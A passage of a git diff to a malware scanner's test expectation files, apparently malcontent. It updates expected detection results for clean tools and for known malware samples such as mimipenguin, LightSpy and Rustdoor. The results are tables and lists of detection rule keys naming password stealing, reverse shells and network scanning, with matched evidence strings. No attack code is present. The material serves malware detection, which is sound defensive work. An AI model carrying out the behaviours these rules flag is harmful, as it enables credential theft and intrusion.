[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) |
+| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) |
+| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) |
+| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
+| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
+| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
+| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple
index ccd6f1313..8a2a5453d 100644
--- a/tests/linux/clean/trivy.simple
+++ b/tests/linux/clean/trivy.simple
@@ -53,6 +53,7 @@ discover/cloud/google_metadata: low
 discover/cloud/google_storage: low
 discover/network/mac_address: medium
 discover/network/netstat: medium
+discover/process/name_get: medium
 discover/processes/list: medium
 discover/system/cpu_info: low
 discover/system/hostname_get: low
@@ -182,7 +183,6 @@ process/executable_path: low
 process/groupid_set: low
 process/groups_set: low
 process/multithreaded: low
-process/name_get: medium
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md
index f365f9270..d21d13145 100644
--- a/tests/linux/clean/trufflehog.md
+++ b/tests/linux/clean/trufflehog.md
@@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | 
[https://api.lessannoyingcrm.com?UserCode=](https://api.lessannoyingcrm.com?UserCode=)
[https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.scraperapi.com?api_key=](https://api.scraperapi.com?api_key=)
[https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png?view=Unified&key=ambiguous](https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png?view=Unified&key=ambiguous)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://sslmate.com/api/v2/certs/example.com?expand=current](https://sslmate.com/api/v2/certs/example.com?expand=current)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) |
+| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) |
 | HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.com](https://github.com/search?q=pastebin.com&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code) |
 | HIGH | [c2/tool_transfer/grayware](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/grayware.yara#grayware_sites) | References websites that host code that can be used maliciously | [shodan.io](https://github.com/search?q=shodan.io&type=code) |
 | HIGH | [discover/ip/public](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/ip/public_ip.yara#iplookup_website) | public service to discover external IP address | [ipify.or](https://github.com/search?q=ipify.or&type=code) |
@@ -68,7 +68,7 @@
 | MEDIUM | [fs/proc/self_mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) |
 | MEDIUM | [impact/ddos](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ddos/ddos.yara#ddos) | References DDoS | [DDoS](https://github.com/search?q=DDoS&type=code) |
 | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [:CodeWithScopeSpacerheartbeatinterval](https://github.com/search?q=%3ACodeWithScopeSpacerheartbeatinterval&type=code)
[ConnServer heartbeat started](https://github.com/search?q=ConnServer+heartbeat+started&type=code)
[HeartbeatMS](https://github.com/search?q=HeartbeatMS&type=code)
[SetHeartbeatInterval](https://github.com/search?q=SetHeartbeatInterval&type=code)
[WithHeartbeatInterval](https://github.com/search?q=WithHeartbeatInterval&type=code)
[WithHeartbeatTimeout](https://github.com/search?q=WithHeartbeatTimeout&type=code)
[be greater than or equal to the heartbeat interva](https://github.com/search?q=be+greater+than+or+equal+to+the+heartbeat+interva&type=code)
[comWriteDocumentElementheartbeatfrequenc](https://github.com/search?q=comWriteDocumentElementheartbeatfrequenc&type=code)
[comheartbeatMain: re](https://github.com/search?q=comheartbeatMain%3A+re&type=code)
[crc32Rolling backcleanup docsheartbeat_msgeo_d](https://github.com/search?q=crc32Rolling+backcleanup+docsheartbeat_msgeo_d&type=code)
[edConnection pool clearedServer heartbeat failedS](https://github.com/search?q=edConnection+pool+clearedServer+heartbeat+failedS&type=code)
[edclient_sql_exceptionFailed to heartbeat](https://github.com/search?q=edclient_sql_exceptionFailed+to+heartbeat&type=code)
[eerror setting read deadline in heartbeater:](https://github.com/search?q=eerror+setting+read+deadline+in+heartbeater%3A&type=code)
[eonly valid as initial handshakeheartbeat is not](https://github.com/search?q=eonly+valid+as+initial+handshakeheartbeat+is+not&type=code)
[heartbeatCtxCance](https://github.com/search?q=heartbeatCtxCance&type=code)
[heartbeatFrame](https://github.com/search?q=heartbeatFrame&type=code)
[heartbeatInterval](https://github.com/search?q=heartbeatInterval&type=code)
[heartbeatLock](https://github.com/search?q=heartbeatLock&type=code)
[heartbeatTimeout](https://github.com/search?q=heartbeatTimeout&type=code)
[icedisableConsoleLoginfailed to heartbeat](https://github.com/search?q=icedisableConsoleLoginfailed+to+heartbeat&type=code)
[newHeartbeatDuration](https://github.com/search?q=newHeartbeatDuration&type=code)
[orcHeartbeating](https://github.com/search?q=orcHeartbeating&type=code)
[overflow reading version stringHeartbeats should](https://github.com/search?q=overflow+reading+version+stringHeartbeats+should&type=code)
[parquetheartbeat started](https://github.com/search?q=parquetheartbeat+started&type=code)
[parseHeartbeatFrame](https://github.com/search?q=parseHeartbeatFrame&type=code)
[pollHeartbeatTime](https://github.com/search?q=pollHeartbeatTime&type=code)
[publishServerHeartbeatFailedEv](https://github.com/search?q=publishServerHeartbeatFailedEv&type=code)
[publishServerHeartbeatStartedE](https://github.com/search?q=publishServerHeartbeatStartedE&type=code)
[publishServerHeartbeatSucceede](https://github.com/search?q=publishServerHeartbeatSucceede&type=code)
[setupHeartbeatConnecti](https://github.com/search?q=setupHeartbeatConnecti&type=code)
[sha1publickeysubsystemheartbeatwithcoor](https://github.com/search?q=sha1publickeysubsystemheartbeatwithcoor&type=code)
[sheartbeat stopped](https://github.com/search?q=sheartbeat+stopped&type=code)
[startHeartBeat](https://github.com/search?q=startHeartBeat&type=code)
[stopHeartBeat](https://github.com/search?q=stopHeartBeat&type=code)
[swordincludeRetryReasonstopping heartbeat](https://github.com/search?q=swordincludeRetryReasonstopping+heartbeat&type=code)
[tarting server monitoringServer heartbeat succeed](https://github.com/search?q=tarting+server+monitoringServer+heartbeat+succeed&type=code) |
-| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
+| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
 | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) |
 | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [DoneDownloadCond](https://github.com/search?q=DoneDownloadCond&type=code)
[DownloadArtifactsFile](https://github.com/search?q=DownloadArtifactsFile&type=code)
[DownloadAvatar](https://github.com/search?q=DownloadAvatar&type=code)
[DownloadContentsWithMeta](https://github.com/search?q=DownloadContentsWithMeta&type=code)
[DownloadPackageFile](https://github.com/search?q=DownloadPackageFile&type=code)
[DownloadReleaseAsset](https://github.com/search?q=DownloadReleaseAsset&type=code)
[ExportDownload](https://github.com/search?q=ExportDownload&type=code)
[FTPDownload](https://github.com/search?q=FTPDownload&type=code)
[FailedDownloads](https://github.com/search?q=FailedDownloads&type=code)
[FuncDownloadHelper](https://github.com/search?q=FuncDownloadHelper&type=code)
[GeoIpDownloadStatistics](https://github.com/search?q=GeoIpDownloadStatistics&type=code)
[GetArchiveDownloadURL](https://github.com/search?q=GetArchiveDownloadURL&type=code)
[GetBrowserDownloadURL](https://github.com/search?q=GetBrowserDownloadURL&type=code)
[GetDownloadCount](https://github.com/search?q=GetDownloadCount&type=code)
[GetDownloadLocation](https://github.com/search?q=GetDownloadLocation&type=code)
[GetDownloadURL](https://github.com/search?q=GetDownloadURL&type=code)
[GetDownloadsURL](https://github.com/search?q=GetDownloadsURL&type=code)
[GetHasDownloads](https://github.com/search?q=GetHasDownloads&type=code)
[GetTempDownloadToken](https://github.com/search?q=GetTempDownloadToken&type=code)
[MFA_TOKENdownload start chunk](https://github.com/search?q=MFA_TOKENdownload+start+chunk&type=code)
[NextDownloader](https://github.com/search?q=NextDownloader&type=code)
[NodeInfoIngestDownloader](https://github.com/search?q=NodeInfoIngestDownloader&type=code)
[STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG](https://github.com/search?q=STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG&type=code)
[SuccessfulDownloads](https://github.com/search?q=SuccessfulDownloads&type=code)
[URLDownloadToFile](https://github.com/search?q=URLDownloadToFile&type=code)
[addDownloader](https://github.com/search?q=addDownloader&type=code)
[archive_download_url](https://github.com/search?q=archive_download_url&type=code)
[browser_download_url](https://github.com/search?q=browser_download_url&type=code)
[chunkDownloader](https://github.com/search?q=chunkDownloader&type=code)
[chunk_downloader](https://github.com/search?q=chunk_downloader&type=code)
[downloadChunkHelper](https://github.com/search?q=downloadChunkHelper&type=code)
[downloadH](https://github.com/search?q=downloadH&type=code)
[downloadLocation](https://github.com/search?q=downloadLocation&type=code)
[downloadOCSPCacheServer](https://github.com/search?q=downloadOCSPCacheServer&type=code)
[downloadPatches](https://github.com/search?q=downloadPatches&type=code)
[download_count](https://github.com/search?q=download_count&type=code)
[downloader id](https://github.com/search?q=downloader+id&type=code)
[downloads_url](https://github.com/search?q=downloads_url&type=code)
[downloadsrepos](https://github.com/search?q=downloadsrepos&type=code)
[failed_downloads](https://github.com/search?q=failed_downloads&type=code)
[funcDownloadHelper](https://github.com/search?q=funcDownloadHelper&type=code)
[geoipdownloadstatistics](https://github.com/search?q=geoipdownloadstatistics&type=code)
[getNextChunkDownloader](https://github.com/search?q=getNextChunkDownloader&type=code)
[has_downloads](https://github.com/search?q=has_downloads&type=code)
[methodTotalDownloadTimeshards](https://github.com/search?q=methodTotalDownloadTimeshards&type=code)
[newStreamChunkDownloader](https://github.com/search?q=newStreamChunkDownloader&type=code)
[nodeinfoingestdownloader](https://github.com/search?q=nodeinfoingestdownloader&type=code)
[populateChunkDownloader](https://github.com/search?q=populateChunkDownloader&type=code)
[profileno download link found for](https://github.com/search?q=profileno+download+link+found+for&type=code)
[setNextChunkDownloader](https://github.com/search?q=setNextChunkDownloader&type=code)
[snowflakeChunkDownloader](https://github.com/search?q=snowflakeChunkDownloader&type=code)
[sstart downloading](https://github.com/search?q=sstart+downloading&type=code)
[streamChunkDownloader](https://github.com/search?q=streamChunkDownloader&type=code)
[successful_downloads](https://github.com/search?q=successful_downloads&type=code)
[tailChunkDownloader](https://github.com/search?q=tailChunkDownloader&type=code)
[temp_download_token](https://github.com/search?q=temp_download_token&type=code)
[the scheduleddownloads](https://github.com/search?q=the+scheduleddownloads&type=code)
[theequationsdownload](https://github.com/search?q=theequationsdownload&type=code)
[thresholddownloading error](https://github.com/search?q=thresholddownloading+error&type=code)
[total_download_time](https://github.com/search?q=total_download_time&type=code)
[useStreamDownloader](https://github.com/search?q=useStreamDownloader&type=code)
[vMaxChunkDownloadWorkers](https://github.com/search?q=vMaxChunkDownloadWorkers&type=code)
[vmsdownloading done](https://github.com/search?q=vmsdownloading+done&type=code)
[wcould not download file for scan](https://github.com/search?q=wcould+not+download+file+for+scan&type=code)
[wfailed to download patches](https://github.com/search?q=wfailed+to+download+patches&type=code)
[when trying to download file for scan](https://github.com/search?q=when+trying+to+download+file+for+scan&type=code) |
 | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl | [curl / libcurl / php_curl](https://github.com/search?q=curl+%2F+libcurl+%2F+php_curl&type=code) |
@@ -114,6 +114,7 @@
 | LOW | [discover/cloud/aws_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/aws-metadata.yara#aws_metadata) | References the AWS EC2 metadata token | [X-aws-ec2-metadata-token](https://github.com/search?q=X-aws-ec2-metadata-token&type=code) |
 | LOW | [discover/cloud/google_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-metadata.yara#google_metadata) | Includes the token required to use the Google Cloud Platform metadata server | [Metadata-Flavor](https://github.com/search?q=Metadata-Flavor&type=code) |
 | LOW | [discover/cloud/google_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-storage.yara#go_import) | Capable of using Google Cloud Storage (GCS) | [cloud.google.com/go/storage](https://github.com/search?q=cloud.google.com%2Fgo%2Fstorage&type=code) |
+| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
 | LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) |
 | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) |
 | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | 
[syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) |
@@ -183,6 +184,5 @@
 | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real, effective, and saved group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
 | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
 | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
-| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
 | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/viewgam.md b/tests/linux/clean/viewgam.md
index b873ee458..8ba839e52 100644
--- a/tests/linux/clean/viewgam.md
+++ b/tests/linux/clean/viewgam.md
@@ -3,7 +3,6 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) |
-| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
 | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [Download manager stalled](https://github.com/search?q=Download+manager+stalled&type=code)
[DownloadManager](https://github.com/search?q=DownloadManager&type=code)
[activeDownloads](https://github.com/search?q=activeDownloads&type=code)
[downloadCount--](https://github.com/search?q=downloadCount--&type=code)
[downloadStartTimer](https://github.com/search?q=downloadStartTimer&type=code)
[downloading](https://github.com/search?q=downloading&type=code)
[internalDownloadCount-](https://github.com/search?q=internalDownloadCount-&type=code)
[maxActiveDownloads](https://github.com/search?q=maxActiveDownloads&type=code)
[maxDownloads](https://github.com/search?q=maxDownloads&type=code)
[removeDownload](https://github.com/search?q=removeDownload&type=code)
[tryNextDownload](https://github.com/search?q=tryNextDownload&type=code)
[var downloadCallbacks](https://github.com/search?q=var+downloadCallbacks&type=code) |
 | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WebSocket](https://github.com/search?q=WebSocket&type=code) |
 | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) |
diff --git a/tests/linux/clean/wolfictl.simple b/tests/linux/clean/wolfictl.simple
index a8e53c4ae..b0708c44b 100644
--- a/tests/linux/clean/wolfictl.simple
+++ b/tests/linux/clean/wolfictl.simple
@@ -55,7 +55,7 @@ discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
 evasion/bypass_security/macos/xprotect: medium
 evasion/file/location/dev_shm: medium
-evasion/file/location/system_directories: medium
+evasion/file/location/system_directory: medium
 evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
diff --git a/tests/linux/mimipenguin/python/mimipenguin.simple b/tests/linux/mimipenguin/python/mimipenguin.simple
index bc884bf20..9e1275d11 100644
--- a/tests/linux/mimipenguin/python/mimipenguin.simple
+++ b/tests/linux/mimipenguin/python/mimipenguin.simple
@@ -7,6 +7,7 @@ credential/password/finder: high
 credential/ssh/d: medium
 data/base64/decode: medium
 data/encoding/base64: low
+discover/process/name_get: medium
 discover/processes/list: medium
 discover/system/platform: medium
 exfil/stealer/password: critical
@@ -22,4 +23,3 @@ net/url/embedded: low
 os/fd/read: low
 persist/daemon: medium
 privesc/sudo: medium
-process/name_get: medium
diff --git a/tests/macOS/2024.Ezuri/libdpt1.so.simple b/tests/macOS/2024.Ezuri/libdpt1.so.simple
index b43228808..5851a1c32 100644
--- a/tests/macOS/2024.Ezuri/libdpt1.so.simple
+++ b/tests/macOS/2024.Ezuri/libdpt1.so.simple
@@ -12,7 +12,6 @@ fs/path/users: medium
 fs/permission/chown: medium
 fs/permission/modify: medium
 impact/remote_access/net_exec: medium
-lateral/scan/tool: medium
 net/socket/receive: low
 net/socket/send: low
 process/multithreaded: low
diff --git a/tests/macOS/2024.LightSpy/dropper.simple b/tests/macOS/2024.LightSpy/dropper.simple
index 876122683..913a536eb 100644
--- a/tests/macOS/2024.LightSpy/dropper.simple
+++ b/tests/macOS/2024.LightSpy/dropper.simple
@@ -6,10 +6,11 @@ c2/tool_transfer/macos: critical
 crypto/aes: low
 crypto/xor: high
 data/hash/md5: medium
+discover/process/name_get: medium
 discover/system/cpu_info: low
 discover/system/network: high
 discover/system/platform: medium
-evasion/file/location/odd_pidfile: high
+evasion/file/location/pidfile: high
 exec/dylib/symbol_address: medium
 exec/dylib/user: medium
 exec/plugin: low
@@ -30,5 +31,4 @@ os/kernel/dispatch_semaphore: low
 os/sync/semaphore_user: low
 persist/daemon: medium
 persist/pid_file: medium
-process/name_get: medium
 sus/entitlement: medium
diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple
index d5fe25d55..7ac915779 100644
--- a/tests/macOS/2024.Rustdoor/localfile.simple
+++ b/tests/macOS/2024.Rustdoor/localfile.simple
@@ -45,7 +45,6 @@ fs/tempdir: low
 fs/tempdir/TMPDIR: low
 hw/disk_info: medium
 impact/remote_access/reverse_shell: medium
-lateral/scan/tool: medium
 malware/family/rustdoor: critical
 net/download: medium
 net/download/fetch: high
diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff
index cf15f5aae..939d68075 100644
--- a/tests/macOS/clean/ls.mdiff
+++ b/tests/macOS/clean/ls.mdiff
@@ -2,7 +2,6 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |---------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| -MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[socket](https://github.com/search?q=socket&type=code)
